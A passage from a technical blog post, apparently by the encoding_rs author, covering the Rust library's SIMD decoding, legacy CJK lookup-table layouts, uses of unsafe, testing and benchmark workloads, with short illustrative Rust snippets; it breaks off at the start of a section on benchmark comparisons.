Unlike the other decoders, the x-user-defined decoder doesn’t have an optimized ASCII fast path. This is because the main remaining use case for x-user-defined is loading binary data via XMLHttpRequest in code written before proper binary data support via ArrayBuffers was introduced to JavaScript. (Note that when HTML is declared as x-user-defined via the meta tag, the windows-1252 decoder is used in place of the x-user-defined decoder.)

When decoding to UTF-8, the byte length of the output varies depending on content, so the operation is not suitable for SIMD. The loop simply works on a per-byte basis. However, when decoding to UTF-16 with SIMD enabled, each u8x16 vector is zero-extended into two u16x8 vectors. A mask is computed by a lane-wise greater-than comparison to see which lanes are not in the ASCII range. The mask is used to retain the corresponding lanes from a vector with all lanes set to 0xF700, and the result is added to the original u16x8 vector.
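
In scalar form, the per-byte mapping that the SIMD code applies sixteen bytes at a time is simply this (a sketch):
fn x_user_defined_byte_to_utf16(byte: u8) -> u16 {
    if byte < 0x80 {
        byte as u16          // ASCII passes through
    } else {
        0xF700 + byte as u16 // 0x80..=0xFF map to U+F780..=U+F7FF
    }
}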

Portable SIMD

(Nightly) Rust provides access to portable SIMD which closely maps to LLVM’s notion of portable SIMD. There are portable types, such as the u8x16 and u16x8 types used by encoding_rs. These map to SSE registers on x86 & x86_64 and NEON registers on ARMv7 & aarch64, for example. The portable types provide lane-wise basic arithmetic, bitwise operations, and comparisons in a portable manner and with generally predictable performance characteristics. Additionally, there are portable shuffles where the shuffle pattern is constant at compile time. The performance characteristics of shuffles rely heavily on the quality of implementation of specific LLVM back ends, so with shuffles it’s a good idea to inspect the generated assembly.

The portable types can be zero-cost transmuted into vendor-specific types in order to perform operations using vendor-specific intrinsics. This means that SIMD code can generally be written in a portable way and specific operations can be made even faster using vendor-specific operations. For example, checking if a u8x16 contains only ASCII can be done very efficiently on SSE2 and aarch64, so the SIMD “is this u8x16 ASCII?” operation in encoding_rs has vendor-specific specializations for SSE2 and aarch64. This is an amazing improvement over C. With C, an entire larger function / algorithm that uses SIMD ends up being written separately for each instruction set using vendor intrinsics for everything—even the basic operations that are supported by practically all vendors. It often happens that such vendor-specific code is written only for x86/x86_64 with ARMv7 or aarch64 left as a todo and POWER, etc., completely ignored.
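
For example, a portable ASCII check looks roughly like this (a sketch assuming the nightly std::simd portable SIMD API; encoding_rs itself was written against the earlier external SIMD crates, and module paths have moved over time). A vendor-specific specialization can replace this where a faster instruction sequence exists, such as a movemask on SSE2:
#![feature(portable_simd)]
use std::simd::u8x16;

fn is_ascii(v: u8x16) -> bool {
    // All lanes are ASCII iff no lane has its high bit set.
    (v & u8x16::splat(0x80)) == u8x16::splat(0)
}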

Despite Rust making SIMD portable, performance tuning for specific architectures using conditional compilation to turn alternative implementations on or off is still needed. For example, because NEON on ARMv7 lacks an efficient “is this u8x16 ASCII?” check, using NEON for processing the ASCII runs in UTF-8 validation turned out not to be an improvement over ALU-only code on ARMv7, even though using SIMD in UTF-8 validation makes sense on x86 and x86_64. On the other hand, the difference between using aligned or unaligned SIMD loads and stores is negligible on aarch64 (tested on ThunderX), so on that architecture encoding_rs uses unaligned loads and stores unconditionally. However, especially on Core2 Duo-era x86_64, the difference between using aligned access compared to using unaligned loads and stores with addresses that are actually aligned is very significant, so in the SSE2 case encoding_rs checks for alignment first and has four-way specializations for the four combinations of the source and destination being aligned or unaligned. As of June 2018, 20% of the Firefox x86/x86_64 release population was still on the kind of x86/x86_64 CPU where there’s a substantial performance disparity between aligned and unaligned SIMD loads and stores with actually aligned addresses.

Punctuation Loops

Using SIMD for ASCII poses the problem that many non-Latin scripts use ASCII spaces and punctuation. If we return directly to the SIMD path upon seeing a single ASCII byte after a sequence of non-ASCII, we may end up processing a SIMD vector only to find that it’s not fully ASCII, because it just starts with an ASCII space or an ASCII punctuation character followed by an ASCII space and then non-ASCII follows again.

For non-Latin scripts that use ASCII spaces and punctuation, after non-ASCII it is useful to have a loop that keeps processing ASCII bytes using the ALU as long as the byte values are below the less-than sign. This way, ASCII spaces, punctuation and digits do not result in unhelpful use of SIMD, but HTML markup results in a jump back to the SIMD path.

In the case of the legacy CJK encodings, it’s easy to decide whether to have such a punctuation loop or not: Korean benefits from one, so EUC-KR gets such a loop. Chinese and Japanese don’t benefit from such a loop, so the rest of the legacy CJK encodings don’t get one.

The decision is trickier for single-byte encodings and UTF-8. In the interest of code size, all the single-byte encodings (other than x-user-defined) are handled with the same code. For the Latin encodings, it would be beneficial not to have a punctuation loop. For Cyrillic, Greek, Arabic and Hebrew, it is beneficial to have the punctuation loop. Decoding the Latin single-byte encodings is faster anyway, so the punctuation loop is therefore used for all single-byte encodings for the benefit of the ones that are non-Latin but use ASCII spaces and punctuation.

UTF-8 calls for a one-size-fits-all solution. By the same logic, one would expect a punctuation loop in the UTF-8 to UTF-16 decoder. Yet, there is none. I don’t recall the details, but a punctuation loop didn’t behave well there, and I didn’t investigate why. The conversion loop is pretty delicate even without a punctuation loop, so maybe there was some bad interaction in the optimizer. Rust has been through LLVM major version updates since I experimented with this code, so it might be worthwhile to experiment again.

Fast Instantiation of Converters

Character encoding conversion libraries typically reserve the right to perform expensive operations when a decoder or an encoder is instantiated. Expensive operations could include loading lookup tables from the file system, decompressing lookup tables or deriving encode-oriented lookup tables from decode-oriented lookup tables. This is problematic.

When the instantiation of a converter is potentially expensive, libraries end up recommending that callers hold onto converters and reset them between uses. Since encoding_rs builds BOM handling into the decoders, does so by varying the initial state of a state machine, and BOM sniffing can change what encoding the decoder is for, being able to reset a decoder would require storing a second copy of the initial state in the decoder. More importantly, though, the usage patterns for character encoding converters tend to be such (at least in a Web browser) that there isn’t a natural way for callers to hold onto converters, and creating some kind of cache for recycled converters creates threading problems and shouldn’t be the callers’ responsibility anyway. Even a thread-safe once-per-process heap allocation on first use would be a problem. Firefox is both a multi-threaded and a multi-process application. E.g. generating a heap-allocated encode-optimized lookup table in a thread-safe way on first use would end up costing the footprint of the table in each process even if sharing between threads appeared simple enough.

To avoid these problems, encoding_rs guarantees that instantiating a converter is a very cheap operation: just a matter of loading some constants into a few machine words. No up-front computation on the data tables is performed during the converter instantiation. The data tables are Plain Old Data arranged in the layout that the conversion algorithms access. Of course, if the relevant part of the program binary hasn’t been paged in yet, accessing the data tables can result in the operating system paging them in.

Single-Byte Lookup Table Layout

The Encoding Standard gives the mapping tables for the legacy encodings as arrays indexed by what the spec calls the “pointer”. For single-byte encodings, the pointer is simply the unsigned byte value minus 0x80. That is, the lower half passes through as ASCII and the higher half is used for simple table lookup when decoding.

Conceptually, the encoder side is a linear search through the mapping table. A linear search may seem inefficient and, of course, it is. Still, the encode operation with the legacy encodings is actually rather rare in the Web Platform. It is exposed in only two places: in the error handling for the query strings of URLs occurring as attribute values in HTML and in HTML form submission. The former is error handling for the case where the query string hasn’t been properly percent-escaped and, therefore, relatively rarely has to handle non-ASCII code points. The latter happens mainly in response to a user action that is followed by a network delay. An encoding library can get away with slowness in this case, since the slowness can get blamed on the network anyway. Furthermore, encoder speed that is shockingly slow percentage-wise compared to how fast it could be can still be fast in terms of human-perceivable timescales for the kind of input sizes that typically occur in the text fields of an HTML form.
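
Concretely, for a single-byte encoding the decode lookup and the naive encode search over the decode-oriented table look roughly like this (a sketch; the hypothetical 128-entry forward table uses 0 to mark unmapped pointers, and the real encoder searches quadrant by quadrant as described below rather than front to back):
fn decode_single_byte(byte: u8, forward: &[u16; 128]) -> Option<u16> {
    if byte < 0x80 {
        return Some(byte as u16); // ASCII passes through
    }
    match forward[(byte - 0x80) as usize] {
        0 => None, // unmapped pointer: decode error
        code_point => Some(code_point),
    }
}

fn encode_single_byte(code_point: u16, forward: &[u16; 128]) -> Option<u8> {
    if code_point < 0x80 {
        return Some(code_point as u8);
    }
    // Linear search over the decode-oriented table.
    forward
        .iter()
        .position(|&mapped| mapped == code_point)
        .map(|pointer| pointer as u8 + 0x80)
}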

The design of encoding_rs took place in the context of the CLDR parts of ICU having been accepted as part of desktop Firefox but having been blocked from inclusion in Firefox for Android for an extended period of time out of concern of the impact on apk size. I wanted to make sure that encoding_rs could replace uconv without getting blocked on size concerns on Android. Therefore, since there wasn’t a pressing need for the encoders for legacy encodings to be fast and there was a binary size concern (and the performance concern about encoder instantiation excluded the option of spending time computing an encode-specific lookup table from the decode-oriented tables at instantiation time), I made it a design principle that encoding_rs would have no encoder-specific data tables and instead the encoders would search the decode-oriented data tables even if it meant linear search.

As shipped in Firefox 56, the single-byte encoders in encoding_rs performed a forward linear search across each quadrant of the lookup table for the single-byte encoding such that the fourth quadrant was searched first and the first quadrant was searched last. This search order makes the most sense for the single-byte encodings considered collectively, since most encodings have lower-case letters in the fourth quadrant and the first quadrant is either effectively unused or contains rare punctuation.

In encoding_rs 0.8.11 (Firefox 65), though, as a companion change to compile-time options to speed up legacy CJK encode (discussed below), I relaxed the principle of not having any encode-specific data a little, based on the observation that adding just 32 bits (not bytes!) of encoder-specific data per single-byte encoding could significantly accelerate the encoders for Latin1-like and non-Latin single-byte encodings while not making the performance of non-Latin1-like Latin encodings notably worse. By adding 8 bits for an offset in the lookup table to the start of a run of consecutive code points, 8 bits for the length of the run and 16 bits for an offset to the start of the run in the Unicode code points, the common case (the code point to encode falling within the run) could be handled without a linear search. Unlike in the case of the CJK legacy encode compile-time options, the addition of 32 bits per single-byte encoding was small enough in added footprint that I thought it did not make sense to make it a compile-time option. Instead, the 32 bits per single-byte encoding are there unconditionally.
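
A sketch of how those 32 bits are used (field names hypothetical): if the code point falls inside the recorded run of consecutive code points, the byte is computed directly; otherwise the encoder falls back to the linear search:
struct EncodeRun {
    table_offset: u8,      // where the run starts within the 128-entry table
    run_length: u8,        // how many consecutive code points the run covers
    first_code_point: u16, // the Unicode code point at the start of the run
}

fn encode_via_run(code_point: u16, run: &EncodeRun) -> Option<u8> {
    let delta = code_point.checked_sub(run.first_code_point)?;
    if delta < run.run_length as u16 {
        Some(0x80 + run.table_offset + delta as u8)
    } else {
        None // fall back to searching the decode-oriented table
    }
}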

Multi-Byte Lookup Table Layout

For multi-byte legacy encodings, the pointer is computed from two or more bytes. In that case, the computation forms a linear offset to the array when not all values of the (typically) two bytes are valid or the valid values for the two bytes aren’t contiguous. This is in contrast to some previous formulations where two bytes are interpreted as a 16-bit big endian integer and then that integer is considered to map to Unicode. Since not all values of the two bytes are in use, simply interpreting the two bytes as a 16-bit big endian integer would result in a needlessly sparse lookup table. (A sparse lookup table can have the benefit of being able to combine bits from the lead and trail byte without an actual multiplication instruction, which may have been important in the past. E.g. Big5 with a dense lookup table involves multiplying by 157, which compiles to an actual multiplication instruction.)

Even with the linearization math provided by the spec, the lookup tables provided by the spec are not fully dense. Since legacy encodings are not exercised by the modern, most performance-sensitive sites and binary size on Android was a concern, I sought to make the lookup tables more compact, potentially trading off a bit of performance. Visualizing the lookup table for EUC-KR (warning: the link points to a page that may be too large for phones with little RAM) reveals that the lookup table has two unused vertical bands as well as an unused lower left quadrant. The Japanese lookup tables (JIS X 0208 with vendor extensions and JIS X 0212) also have unused ranges. The gbk lookup table has no unused parts but in place of unused parts has areas filled with consecutive Private Use Area code points. More generally, the lookup tables have ranges of pointers that map to consecutive Unicode code points. As the most obvious examples, the Hiragana and Katakana characters occur in the lookup tables in the same order as they appear in Unicode, therefore forming ranges of consecutive code points. The handling of such ranges can be performed by excluding them from the lookup table and instead writing a range check (and offset addition) in the decoder program code. (Aside: The visualizations were essential in order to gain understanding of the structure of the legacy CJK encodings. I developed the visualizations when working on encoding_rs and contributed them to the spec.)

Furthermore, the way EUC-KR and gbk have been extended from their original designs has a relationship with Unicode. The original smaller lookup table appears in the visualizations of the extended lookup tables on the lower right. In the case of EUC-KR, the original KS X 1001 lookup table contains the Hangul syllables in common use. In the case of gbk, the original GB2312 lookup table contains the most common (simplified) Hanzi ideographs. The extended lookup table for EUC-KR, at the top and on the left, contains in the Unicode order all the Hangul syllables from the Hangul Syllables Unicode block that weren’t already included in the original KS X 1001 part on the lower right. Likewise, the extended lookup table for gbk, at the top and on the left, contains in the Unicode order all the ideographs from the CJK Unified Ideographs Unicode block that weren’t already included in the original GB2312 part on the lower right.

That is, after omitting the empty vertical bands in EUC-KR, in both EUC-KR and gbk the top part and the bottom left part form runs of consecutive code points such that the last code point in each run is less than the first code point in the next run. These are stored as tables (one for the top and another for the bottom left) that contain the (linearized) pointer for the start of each such run and tables of equal length that contain the first code point of each run. When decoding, a binary search with the linearized pointer can be performed to locate the start of the run that the pointer belongs to. The code point at the start of the run can then be obtained by reading the corresponding item from the table of the first code points of the runs. The correct code point within the run can be obtained by adding to the first code point the offset obtained by subtracting the pointer to the start of the run from the pointer being searched. On the encoder side, once it has been established that the Hangul Syllable code point (in the EUC-KR case) or the CJK Unified Ideograph code point (in the gbk case) wasn’t found in the lower right part of the lookup table, a linear search with the code point can be performed instead over the table containing the first code point of each run. (This process could be optimized even further by arranging the tables in the Eytzinger order instead.)
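
A sketch of the decode side of this scheme (table names hypothetical; both tables are sorted by pointer and the pointer is assumed to be at or after the start of the first run):
fn decode_from_runs(pointer: u16, run_pointers: &[u16], run_first_code_points: &[u16]) -> u16 {
    // Find the run whose start is the largest value <= pointer.
    let run = match run_pointers.binary_search(&pointer) {
        Ok(i) => i,      // pointer is exactly at the start of run i
        Err(i) => i - 1, // pointer falls inside run i - 1
    };
    run_first_code_points[run] + (pointer - run_pointers[run])
}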

Adding more program code in order to make the lookup tables smaller worked in most cases. Replacing ranges like Hiragana and Katakana with explicitly-programmed range checks and by compressing the top and bottom left parts of EUC-KR and gbk as described above resulted in an overall binary size reduction except for big5. In the case of big5, the added program code seemed to exceed the savings from a slightly smaller lookup table. That’s why the above techniques were not applied in released code to Big5 after all.

However, Big5 did provide the opportunity to separate the Unicode plane from the lower 16 bits instead of having to store 32-bit scalar values. The other lookup tables (excluding the non-gbk part of gb18030, which is totally different) only contain code points from the Basic Multilingual Plane, so the code points can be stored in 16 bits. The lookup table for Big5, however, contains code points from above the Basic Multilingual Plane. Still, the code points from above the Basic Multilingual Plane are not arbitrary code points. Instead, they are all from the Supplementary Ideographic Plane. Therefore, the main lookup table can contain the low 16 bits and then there is a bitmap that indicates whether the code point is on the Basic Multilingual Plane or on the Supplementary Ideographic Plane.

It is worth noting that while the attempts to make the tables smaller strictly add branching when decoding to UTF-16, in some cases when decoding to UTF-8 they merely move a branch to a different place. For example, when the code has a branch to handle e.g. Hiragana by offset mapping, it knows that a Hiragana character will be three bytes in UTF-8, so the branch to decide the UTF-8 sequence length based on the scalar value is avoided. (There are separate methods for writing output that is known to be three bytes in UTF-8, output that is known to be two bytes in UTF-8, and output that might be either two or three bytes in UTF-8. In the UTF-16 case, all these methods do the same thing and output a single UTF-16 code unit.)

The effort to reduce the binary size was successful in the sense that the binary size of Firefox was reduced when encoding_rs replaced uconv, even though encoding_rs added new functionality to support decoding directly to UTF-8 and encoding directly from UTF-8.

Optional Encode-Oriented Tables for Multi-Byte Encodings

In the case of Hangul syllables when encoding to EUC-KR even the original unextended KS X 1001 part of the mapping table is in the Unicode order due to KS X 1001 and Unicode agreeing on how the syllables should be sorted. This enables the use of binary search when encoding Hangul into EUC-KR without encode-specific lookup tables.

However, with the exception of the gbk extension part that was not in the original GB2312, the way the CJK Unified Ideographs have been laid out in the legacy standards has no obvious correspondence to Unicode order. As far as I’m aware, the options are doing a linear search over the decode-oriented data tables or introducing additional encode-oriented data tables. The relative performance difference between these two approaches is, obviously, dramatic.

Even though testing indicated that linear search over the decode-oriented data tables yielded acceptable human-perceived performance for the browser-relevant use cases even on phone-like hardware, I wanted to have a backup plan in case my determination of the human-perceived performance was wrong and users ended up complaining. Still, I tried to come up with a backup plan that would reach uconv performance (which already wasn’t as fast as an implementation willing to spend memory on encode-specific tables could be) without having to add lookup tables as large as the obviously fast solution of having a table large enough to index by the offset to the CJK Unified Ideographs block would require.

Ideographs appear to be practically unused in modern Korean online writing, so accelerating Hanja to EUC-KR encode wasn’t important. On the other hand, GB2312, original Big5 (without the HKSCS parts) and JIS X 0208 all have the ideographs organized into two ranges: Level 1 and Level 2, where Level 1 contains the more frequently used ideographs. As the backup plan, I developed compile-time-optional encode acceleration of the Level 1 areas of these three mapping tables.

Since this was a mere backup plan, instead of researching better data structures for the problem, I went with the most obvious one: For each of the three legacy standards, an array of the Level 1 Hanzi/Kanji sorted in the Unicode order and another array of the same length sorted in the corresponding order containing arrays of two bytes already encoded in the target encoding. In the case of JIS X 0208, there are three target encodings, so I used the most common one, Shift_JIS, for the bytes and added functions to transform the bytes to EUC-JP and ISO-2022-JP.

This solution was enough to make encode to the legacy CJK encodings many times faster than uconv. The backup plan, however, didn’t end up needing to ship in Firefox. Linear search seems to be fast enough, considering that users didn’t complain. Indeed, a linear search-based Big5 encoder had already shipped in Firefox 43 without complaints from users. (However, that wasn’t a sufficient data point on its own, since, anecdotally, it seems that the migration from Big5 to UTF-8 on the Web is further along than the migration from Shift_JIS and gbk.)

Even though impressive relative to uconv performance, accelerating Level 1 Hanzi/Kanji encode using binary search remained very slow relative to other encoding conversion libraries. In order to remove the perception that encoding_rs is very slow for some use cases, I implemented a compile-time option to use encode-only lookup tables that are large enough to index into directly by the offset into the Hangul Syllables or CJK Unified Ideographs Unicode blocks. With these options enabled, encoding_rs legacy CJK encoder performance is within an order of magnitude of ICU and kernel32.dll, though still generally not exceeding their performance for plain text (that doesn’t have a lot of ASCII markup). Presumably, to match or exceed their performance, encoding_rs would need to use even larger lookup tables directly indexable by Basic Multilingual Plane code point and to have even fewer branches. It is worth noting, though, that while even larger lookup tables might win micro-benchmarks, they might have adverse effects on other code in real application workloads by causing more data to be evicted from caches during the encoding process.

In general, a library that seeks high encoder performance should probably take the advice given in the Unicode Standard and use an array of 256 pointers indexed by the high half of the Basic Multilingual Plane code point, where each pointer either points to an array of 256 pre-encoded byte pairs indexed by the lower half of the Basic Multilingual Plane code point or is a null pointer if all possible low bit combinations are unmapped.
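
A minimal sketch of that layout (not what encoding_rs ships; the names and the use of [0, 0] as an "unmapped" marker are made up for illustration):

    // 256 optional second-level tables indexed by the high byte of a BMP code
    // point; each second-level table holds 256 pre-encoded byte pairs indexed
    // by the low byte. None and [0, 0] both stand for "unmapped" here.
    static ENCODE_TABLE: [Option<&'static [[u8; 2]; 256]>; 256] = [None; 256];

    fn encode_bmp(code_point: u16) -> Option<[u8; 2]> {
        let second_level = ENCODE_TABLE[(code_point >> 8) as usize]?;
        let pair = second_level[(code_point & 0xFF) as usize];
        if pair == [0, 0] { None } else { Some(pair) }
    }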

Still, considering that a Web browser gets away with relatively slow legacy encoders, chances are that many other applications do, too. In general, applications should use UTF-8 for interchange and, therefore, not use the legacy encoders except where truly needed for backward compatibility. Chances are that most applications won’t need to use the compile-time options to enhance encoder performance and if they do, it’s probably more about getting the performance on a level where untrusted input can’t exercise excessively slow code paths rather than about maximal imaginable performance being essential. At this point, it doesn’t make sense to introduce compile options that would deviate more from the Firefox-relevant code structure for the sake of winning legacy encoder benchmarks.

Safety

One generally expects Rust code to be safe. Rust code that doesn’t use unsafe is obviously safe. Rust code that uses unsafe is safe only if unsafe has been used correctly. Semi-alarmingly, encoding_rs uses unsafe quite a bit.

Still, unsafe isn’t used in random ways. Instead, it’s used for certain things and only in certain source files. In particular, it is not used inside the source files that implement the logic for the legacy CJK encodings, which in the C++ implementation would be the riskiest area in terms of memory-safety bugs. This is not to say that all the unsafe is appropriate. Some of it would be avoidable right now, but the better way either didn’t exist or didn’t exist outside nightly Rust when I wrote the code, and some will likely become avoidable in the future.

Here’s an overview of the kinds of unsafe in encoding_rs:

Unchecked conversion of u32 to char

A couple of internal APIs use char to signify Unicode scalar value. However, the scalar value gets computed in a way that first yields the value as u32. Since the value is in the right range by construction, it is reinterpreted as char without the cost of the range check. Some of this use of unsafe could be avoided by using u32 instead of char internally in some places. It’s unclear if the current usage is worthwhile.
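
For illustration (a sketch, not the actual code), the pattern looks like this; the caller must guarantee, by construction, that the value is a valid scalar value:

    /// The caller must guarantee that `scalar` is neither a surrogate nor
    /// above U+10FFFF; in the decoder this holds by construction.
    #[inline(always)]
    unsafe fn scalar_to_char(scalar: u32) -> char {
        debug_assert!(core::char::from_u32(scalar).is_some());
        core::char::from_u32_unchecked(scalar)
    }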

Writing to &mut str as &mut [u8]

Since dealing with character encodings is the core competence of encoding_rs, it would be silly to run the standard library’s UTF-8 validation on encoding_rs’s UTF-8 output. Instead, encoding_rs uses unsafe to assert the validity of its UTF-8 output to the type system. It doesn’t make sense to try to get rid of this use of unsafe. It’s fundamental to the crate.
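
In outline, the pattern is to view the &mut str as bytes and rely on the decoder’s guarantee that what it writes is valid UTF-8 (a trivialized sketch, not the library’s actual code):

    fn fill_with_ascii(dst: &mut str, byte: u8) {
        assert!(byte.is_ascii());
        // Sound only because every byte written below keeps the buffer valid UTF-8.
        let bytes = unsafe { dst.as_bytes_mut() };
        for b in bytes.iter_mut() {
            *b = byte;
        }
    }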

Calling Intrinsics

Rust makes intrinsics categorically unsafe even in cases where there isn’t actually anything that logically requires a given intrinsic to be unsafe. This results in the use of unsafe to call vendor-specific SIMD operations and to annotate if conditions for branch prediction using likely/unlikely. This kind of unsafe makes the code look harder to read and scarier than it actually is, but it is easy to convince oneself that this kind of unsafe is not risky in terms of the overall safety of the crate.
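
For example, checking whether sixteen bytes are all ASCII with SSE2 needs unsafe only because the vendor intrinsics are declared unsafe (an illustrative sketch, not the actual code):

    #[cfg(target_arch = "x86_64")]
    fn sixteen_bytes_are_ascii(bytes: &[u8; 16]) -> bool {
        use std::arch::x86_64::{__m128i, _mm_loadu_si128, _mm_movemask_epi8};
        // SSE2 is part of the x86_64 baseline, so this is always available here;
        // the unsafe block exists only because intrinsics are declared unsafe.
        unsafe {
            let v = _mm_loadu_si128(bytes.as_ptr() as *const __m128i);
            // The mask collects the high bit of each byte; all zeros means ASCII.
            _mm_movemask_epi8(v) == 0
        }
    }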

SIMD Bitcasts

When working with SIMD, it is necessary to convert between different lane configurations in a way that is just a type-system-level operation and on the machine level is nothing: the register is the same and the operations determine how the contents of the register are interpreted. As a consequence, reinterpreting a SIMD type of a given width in bits (always 128 bits in encoding_rs) as another SIMD type of the same width in bits should be OK if both types have integer lanes (i.e. all bit patterns are valid). I expect that in the future, Rust will gain safe wrappers for performing these reinterpretations. Such wrappers already exist behind a feature flag in the packed_simd crate.
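
The operation is essentially a transmute between same-sized integer-lane types. As a stand-in illustration using plain arrays instead of the SIMD vector types (not the actual code):

    // Reinterpreting sixteen u8 lanes as eight u16 lanes. Both types are 16
    // bytes wide and every bit pattern is valid for integer lanes, so the
    // transmute is sound. (How the lanes pair up depends on endianness, just
    // as it does for the register interpretation.)
    fn reinterpret_lanes(v: [u8; 16]) -> [u16; 8] {
        unsafe { std::mem::transmute(v) }
    }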

Re-Interpreting Slices as Sequences of Different Types

The ASCII acceleration code reads and writes slices of u8 and u16 as usize (if SIMD isn’t enabled) or as u8x16 and u16x8 (if SIMD is enabled). This is done by casting pointers and by dereferencing pointers. This, obviously, is not ideal in terms of confidence in the correctness of the code. Indeed, this kind of code in the mem module had a bug that made it into a crates.io release of encoding_rs, though I believe no one actually deployed that code to end users before the problem was remedied.

While, based on fuzzing, I believe this code to be correct, in the future it could potentially be made more obviously correct by using align_to(_mut) on primitive slices (stabilized in Rust 1.30.0) and from_slice_aligned/from_slice_unaligned and, possibly, their _unchecked variants on SIMD types in the packed_simd crate. However, some of these, notably align_to, are themselves unsafe, even though align_to wouldn’t need to be unsafe when both slice item types allow all bit patterns in their value space, as primitive integers and integer-lane SIMD vectors do.

Unaligned Memory Access

Especially with SIMD but also with UTF-16LE and UTF-16BE, unaligned memory access is done with unsafe and std::ptr::copy_nonoverlapping which LLVM optimizes the same way as C’s memcpy idioms.
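
For example, a potentially unaligned little-endian UTF-16 code unit can be read by copying two bytes into a local buffer, which LLVM compiles to a plain load (a sketch, not the actual code):

    fn read_u16_le(bytes: &[u8], offset: usize) -> u16 {
        assert!(offset + 2 <= bytes.len());
        let mut buf = [0u8; 2];
        unsafe {
            // Equivalent to a two-byte memcpy; no alignment requirement.
            std::ptr::copy_nonoverlapping(bytes.as_ptr().add(offset), buf.as_mut_ptr(), 2);
        }
        u16::from_le_bytes(buf)
    }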

memcpy

In some cases, data is copied from one slice to another using std::ptr::copy_nonoverlapping even when copy_from_slice on primitive slices would do and the bound check wouldn’t be too much of a performance problem. Removing remaining cases like this would not remove the unsafe blocks that they are in, because they are right next to setting the logical length of a Vec in a way that exposes uninitialized memory. Since the length is set right there anyway, it doesn’t make much sense to worry about passing the wrong length to std::ptr::copy_nonoverlapping.
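
The pattern in question looks roughly like this (a simplified sketch, not the actual code); as noted above, copy_from_slice could replace the copy itself, but the adjacent set_len keeps the block unsafe either way:

    fn append_bytes(dst: &mut Vec<u8>, src: &[u8]) {
        dst.reserve(src.len());
        let old_len = dst.len();
        unsafe {
            // Copy into the spare capacity...
            std::ptr::copy_nonoverlapping(src.as_ptr(), dst.as_mut_ptr().add(old_len), src.len());
            // ...and immediately set the logical length to cover what was copied.
            dst.set_len(old_len + src.len());
        }
    }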

Avoiding Bound Checks

Perhaps the most frustrating use of unsafe is to omit bound checks on slice access that the compiler logically should be able to omit from safe code but doesn’t. I hope that in the future, LLVM gets taught more about optimizing away unnecessary bound checks in the kind of IR that rustc emits. At present, it might be possible to write the code differently without unsafe such that the resulting IR would match the kind of patterns that LLVM knows how to optimize. It is not a nice programming experience, though, to try different logically equivalent ways of expressing the code and seeing what kind of assembly comes out of the compiler.

Additionally, there are cases where an array of 128 items is accessed with a byte minus 128 after the byte is known to have its highest bit set. This can’t be expected to be known to the optimizer in cases where the fact that the highest bit is set has been established using vendor-specific SIMD.
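
A sketch of the latter case (not the actual code): once the high bit of the byte is known to be set, the index is provably in range, but the optimizer cannot see that when the fact was established via vendor-specific SIMD:

    fn map_non_ascii(table: &[u16; 128], byte: u8) -> u16 {
        // The caller has established (e.g. via SIMD) that byte >= 0x80,
        // so byte - 0x80 is in 0..=127 and the bound check can be skipped.
        debug_assert!(byte >= 0x80);
        unsafe { *table.get_unchecked(usize::from(byte - 0x80)) }
    }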

Testing

In the opening paragraph, I claimed high correctness. encoding_rs has been tested in various ways. There are small manually-written tests in the Rust source files for edge cases that seemed interesting. Additionally, every index item for every lookup table-based encoding is tested by generating the expectations from the index data via code separate from the main implementation. In the context of Firefox, encoding_rs is tested using the test cases in Web Platform Tests (WPT). All encoding tests in WPT pass, except tests for the new TextDecoderStream and TextEncoderStream JavaScript APIs.

Additionally, encoding_rs is fuzzed using cargo-fuzz, which wraps LLVM’s coverage-guided libFuzzer for use on Rust code.

Benchmarking

Let’s finally take a look at how encoding_rs performs compared to other libraries.

Workloads

When decoding from UTF-8, the test case is the Wikipedia article for Mars, the planet, for the language in question in HTML.

Reasons for choosing Wikipedia were:

  • Wikipedia is an actual top site that’s relevant to users.
  • Wikipedia has content in all the languages that were relevant for testing.
  • Wikipedia content is human-authored (though I gather that the Simplified Chinese text is not directly human-authored but is programmatically derived from human-authored Traditional Chinese text).
  • Wikipedia content is suitably licensed.

The topic Mars, the planet, was chosen, because it is the most-featured topic across the different-language Wikipedias and, indeed, had non-trivial articles in all the languages needed. Trying to choose a typical-length article for each language separately wasn’t feasible in the Wikidata data set.

The languages were chosen to represent the languages that have Web-relevant legacy encodings. In the case of windows-1252, multiple languages with different non-ASCII frequencies were used. The main shortcoming of this kind of selection is that UTF-8 is not tested with a (South Asian) language that would use three bytes per character in UTF-8 with ASCII spaces and would have more characters per typical word than Korean has.

When decoding from a non-UTF-8 encoding, the test case is synthesized from the UTF-8 test case by converting the Wikipedia article to the encoding in question and replacing unmappable characters with numeric character references (and, in the case of Big5, removing a couple of characters that glibc couldn’t deal with).

When testing x-user-defined decode, the test case is a JPEG image, because loading binary data over XHR is the main performance-sensitive use case for x-user-defined.

The JavaScript case represents 100% ASCII and is a minified version of jQuery. (Wikipedia English isn’t 100% ASCII.) The numbers for uconv are missing, because the benchmark was added to the set after the builds made for uconv testing had rotted and were no longer linkable due to changes in the system C++ standard library.

Vietnamese windows-1258 workloads are excluded, because windows-1258 uses combining characters in an unusual way, so a naïve synthesis of windows-1258 test data from precomposed UTF-8 content would not have represented a real workload.

The encoder workloads use plain-text extracts from the decoder test cases in order to simulate form submission (textarea) workloads. That is, the encoder benchmarks do not test ASCII runs of HTML markup, because that scenario isn’t relevant to Web-exposed browser features.

The other Web-relevant case for the encoders is the parsing of URL query strings. In the absence of errors, the query strings are ASCII.

Reference Libraries

Obviously, uconv is benchmarked to understand performance relative to what Gecko had before. rust-encoding is benchmarked to understand performance relative to what was already available in the Rust ecosystem.

ICU and WebKit are benchmarked to understand performance relative to other browsers. WebKit uses its own character encoding converters for UTF-8, UTF-16LE, UTF-16BE, x-user-defined, replacement, and windows-1252 and uses ICU for the others. Chrome inherits this approach from WebKit but has changed the error handling for UTF-8 to be spec-compliant and carries substantial patches to ICU for Encoding Standard compliance. WebKit internals were easier to make available to the benchmark harness, so only WebKit is benchmarked.

WebKit’s windows-1252 is not benchmarked, because trying to use it segfaulted and it wasn’t worthwhile to debug the failure. WebKit on macOS is built with clang, of course, but hopefully building with GCC gives a general idea.

ICU is benchmarked as shipped in Ubuntu, but hopefully that’s close enough performance-wise to the copies of ICU used by Safari and Chrome.

kernel32.dll and glibc represent system APIs. I believe Core Foundation on Mac uses ICU internally, so in that sense ICU also represents a system API. I have no idea if the converters in kernel32.dll are performance-wise representative of what Edge and IE use. (kernel32.dll provides only a non-streaming API publicly while Edge and IE clearly need streaming converters.)

Bob Steagall’s UTF-8 to UTF-16 decoder is benchmarked, because an entire talk claiming excellent results was recently dedicated to it at CppCon and it indeed turned out to be exceptional in its speed for non-ASCII input.

Apples to Oranges Comparisons

Some of the comparisons could be considered to compare things that aren’t commensurable. In particular:

